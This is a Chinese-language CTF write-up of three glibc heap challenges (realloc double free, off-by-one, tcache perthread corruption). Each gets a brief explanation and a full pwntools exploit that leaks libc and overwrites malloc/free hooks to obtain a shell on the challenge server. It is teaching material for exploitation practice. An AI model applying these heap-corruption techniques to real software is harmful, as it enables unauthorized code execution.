目录
ciscn_2019_es_5(realloc double free)
申请没有大小限制,数目上限为10
edit会调用realloc重新申请(其实不会的,因为大小不变)
如果edit就不能show了
看了一下这题没有什么明显漏洞,但是考虑到realloc这里比较特别,这里再贴一下realloc用法
:
size == 0 ,这个时候等同于free
realloc_ptr == 0 && size > 0 , 这个时候等同于malloc
malloc_usable_size(realloc_ptr) >= size, 这个时候等同于edit
malloc_usable_size(realloc_ptr) < szie, 这个时候才是malloc一块更大的内存,将原来的内容复制过去,再将原来的chunk给free掉
如果我们malloc(0),内存管理器仍然会给我们一个0x20大小的chunk,但是如果到了realloc它就会被释放了,然后我们再delete它就造成了double free
然后就是泄露libc,因为没有大小限制,我们申请一个大一点的chunk,释放后进入unsorted bin,然后malloc(8),这样会切割unsorted bin,之后show()就能泄露main_arena+1168的地址了
Exp:
from pwn import *
r = remote("node3.buuoj.cn", 28564)
#r = process("./ciscn_2019_es_5")
context(log_level = 'debug', arch = 'amd64', os = 'linux')
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
b *$rebase(0x103B)
x/10gx $rebase(0x202060)
c
''')
elf = ELF("./ciscn_2019_es_5")
libc = ELF('./libc/libc-2.27.so')
one_gadget_18 = [0x4f2c5,0x4f322,0x10a38c]
menu = "Your choice:"
def add(size, content):
r.recvuntil(menu)
r.sendline('1')
r.recvuntil("size?>")
r.sendline(str(size))
r.recvuntil("content:")
r.sendline(content)
def delete(index):
r.recvuntil(menu)
r.sendline('4')
r.recvuntil("Index:")
r.sendline(str(index))
def show(index):
r.recvuntil(menu)
r.sendline('3')
r.recvuntil("Index:")
r.sendline(str(index))
def edit(index, content, re=True):
r.recvuntil(menu)
r.sendline('2')
r.recvuntil("Index:")
r.sendline(str(index))
if re == True:
r.recvuntil("New content:")
r.send(content)
add(0x500, 'idx0\n')
add(0, '')#1
delete(0)
add(8, 'aaaaaaaa')#0
show(0)
r.recvuntil('a'*8)
malloc_hook = u64(r.recvuntil('\x7f').ljust(8, '\x00')) - 1168 - 0x10
libc.address = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc.sym['__free_hook']
system = libc.sym['system']
success("libc:"+hex(libc.address))
edit(1, '', False)
delete(1)
add(0x10, p64(free_hook))#1
add(0x10, p64(system))#2
add(0x20, '/bin/sh')#3
delete(3)
r.interactive()
npuctf_2020_easyheap(off-by-one)
这题还是有点意思的
add有大小限制
唯一的漏洞是edit的off-by-one
本题我们的做法就是偷梁换柱,因为edit有1个字节溢出,而这个溢出能修改堆上存放大小和指针的控制结构的chunk的size,如果我们申请了0x20,按照程序会申请两个0x20的chunk。这个时候我们用溢出把size改为0x41,释放就能获得一个0x20和0x40的chunk,此时我们申请0x40就能控制一个控制结构了
Exp:
from pwn import *
r = remote("node3.buuoj.cn", 26577)
#r = process("./npuctf_2020_easyheap")
context(log_level = 'debug', arch = 'amd64', os = 'linux')
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
b *0x400E50
x/10gx 0x6020A0
c
''')
elf = ELF("./npuctf_2020_easyheap")
libc = ELF('./libc/libc-2.27.so')
one_gadget_18 = [0x4f2c5,0x4f322,0x10a38c]
atoi_got = elf.got['atoi']
menu = "Your choice :"
def add(size, content):
r.recvuntil(menu)
r.sendline('1')
r.recvuntil("Size of Heap(0x10 or 0x20 only) : ")
r.sendline(str(size))
r.recvuntil("Content:")
r.sendline(content)
def delete(index):
r.recvuntil(menu)
r.sendline('4')
r.recvuntil("Index :")
r.sendline(str(index))
def show(index):
r.recvuntil(menu)
r.sendline('3')
r.recvuntil("Index :")
r.sendline(str(index))
def edit(index, content):
r.recvuntil(menu)
r.sendline('2')
r.recvuntil("Index :")
r.sendline(str(index))
r.recvuntil("Content: ")
r.send(content)
add(0x18, 'aa\n')#0
add(0x18, 'aa\n')#1
add(0x18, 'aa\n')#2
edit(0, 'a'*0x18+'\x41')
delete(1)
payload = 'a'*0x10+p64(0)+p64(0x21)+p64(8)+p64(atoi_got)
add(0x38, payload)#1
show(1)
r.recvuntil("Content : ")
atoi_addr = u64(r.recvuntil('\x7f').ljust(8, '\x00'))
libc.address = atoi_addr - libc.sym['atoi']
system = libc.sym['system']
success("libc:"+hex(libc.address))
edit(1, p64(system))
r.recvuntil(menu)
r.sendline('sh')
r.interactive()
ciscn_2019_sw_5(tcache perthread corruption)
申请大小固定,并且能输出内容
删除机会有3次,并且指针悬挂
利用思路:
- 先进行double free,然后编辑时利用partial rewrite把tcache的fd改为80,然后利用添加时候的输出泄露出heap base
- 接着申请,当heap_base+0x250的chunk被申请出之后在heap_base+0x270处的chunk的fd处写入heap_base+0x20的地址
- 当heap_base+0x270处的chunk被申请处之后,heap_base+0x20的地址就会被放入tcache,然后申请出来,并且把tcache控制结构的0x80大小地方写入heap_base+0x60的地址,并且在heap_base+0x50处伪造一个0x200大小的chunk,然后用add申请出这个伪造的chunk,并且释放,因为大小为0x200因此会被放入unsorted bin,partial rewrite之后就泄露
__malloc_hook
的地址 - 把tcache控制结构的0x80大小地方写入
__malloc_hook
的地址,并且写入one_gadget即可
Exp:
from pwn import *
r = remote("node3.buuoj.cn", 28661)
#r = process("./ciscn_2019_sw_5")
context.log_level = 'debug'
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
b *$rebase(0x8D7)
x/20gx $rebase(0x202040)
bin
''')
elf = ELF("./ciscn_2019_sw_5")
libc = ELF("./libc/libc-2.27.so")
one_gadget_18 = [0x4f2c5,0x4f322,0x10a38c]
def add(title, content):
r.recvuntil(">> ")
r.sendline('1')
r.recvuntil("title:\n")
r.send(title)
r.recvuntil("content:\n")
r.send(content)
def delete(index):
r.recvuntil(">> ")
r.sendline('2')
r.recvuntil("index:\n")
r.sendline(str(index))
add('KMFL\n', 'KMFL\n')#0
add('KMFL\n', 'KMFL\n')#1
delete(0)
delete(0)
add('\x80', '\n')#2
heap_base = u64(r.recvuntil('\x20\n')[0:6].ljust(8, '\x00')) - 0x280
success("heap:"+hex(heap_base))
add(p64(heap_base + 0x20),p64(heap_base + 0x20) * 5)#3
add(p64(heap_base + 0x20),p64(heap_base + 0x20) * 5)#4
payload = ('\xf9' * 0x8) * 6
payload += p64(0x250 - 0x50 + 1) + p64(0) * 4 + p64(heap_base + 0x60)
add('\xaa' * 0x8,payload)#5
payload = p64(0) * 3 + p64(heap_base + 0x60)
add(p64(0),payload)#6
delete(6)
payload = p64(0) * 3 + p64(heap_base + 0x60)
add('\x30',payload)
malloc_hook = u64(r.recvuntil('\x7f').ljust(8, '\x00'))
libc.address = malloc_hook - libc.sym['__malloc_hook']
success("libc:"+hex(libc.address))
one_gadget = libc.address + one_gadget_18[1]
payload = p64(0) * 3 + p64(malloc_hook)
add(p64(0),payload)
add(p64(one_gadget),'\n')
r.recvuntil(">> ")
r.sendline('1')
r.interactive()